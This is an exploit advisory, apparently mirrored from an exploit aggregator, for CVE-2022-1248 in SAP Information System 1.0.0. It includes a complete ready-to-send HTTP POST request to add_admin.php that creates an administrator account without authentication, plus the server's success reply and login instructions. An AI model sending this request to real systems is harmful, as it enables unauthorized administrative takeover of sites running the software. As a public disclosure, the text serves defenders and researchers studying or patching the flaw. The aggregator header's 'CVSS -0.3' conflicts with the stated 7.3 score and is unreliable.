Exploit for SAP Information System 1.0.0 Missing Authorization CVE-2022-1248

Name: Exploit for SAP Information System 1.0.0 Missing Authorization CVE-2022-1248
Rating: 5 (207 reviews)
2022-04-07 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:166609
# Exploit Title: SAP Information System 1.0.0 - Improper Authentication  
# Date: 06/04/2022  
# CVE: CVE-2022-1248  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html  
# Version: 1.0.0  
# Tested on: Linux  
  
  
Title:  
================  
SAP Information System 1.0.0 - Improper Authentication  
  
  
Summary:  
================  
SAP Information System version 1.0.0 suffers from an improper  
authentication vulnerability that allows a malicious user to create an  
administrative account without needing to authenticate. The POST request is  
sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The  
problem occurs due to lack of session verification in the request.  
  
  
Severity Level:  
================  
7.3 (High)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L  
  
  
Affected Product:  
================  
SAP Information System version v1.0.0  
  
  
Steps to Reproduce:  
================  
  
Steps to Reproduce:  
  
1. Copy this request and change the host and send it to the server:  
  
############################################  
  
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1  
Host: target.com  
Content-Length: 345  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI  
Origin: http://target.com  
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c  
Connection: close  
  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="username"  
  
hacker  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="password"  
  
P@ssw0rd!  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="user"  
  
admin  
------WebKitFormBoundaryYELEK8fMdX63l0iI--  
  
############################################  
  
Reply:  
  
############################################  
  
HTTP/1.1 200 OK  
Date: Tue, 05 Apr 2022 16:15:46 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Length: 267  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
<script type="text/javascript">setTimeout(function () { swal("Add Admin  
Successfully!","Message!","success");}, 1000);</script><script  
type="text/javascript">setTimeout(function(){window.location =  
"/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>  
  
############################################  
  
2. Go to the login page and enter the hacker:P@ssw0rd! credential. After  
that you will be logged in with an administrative account.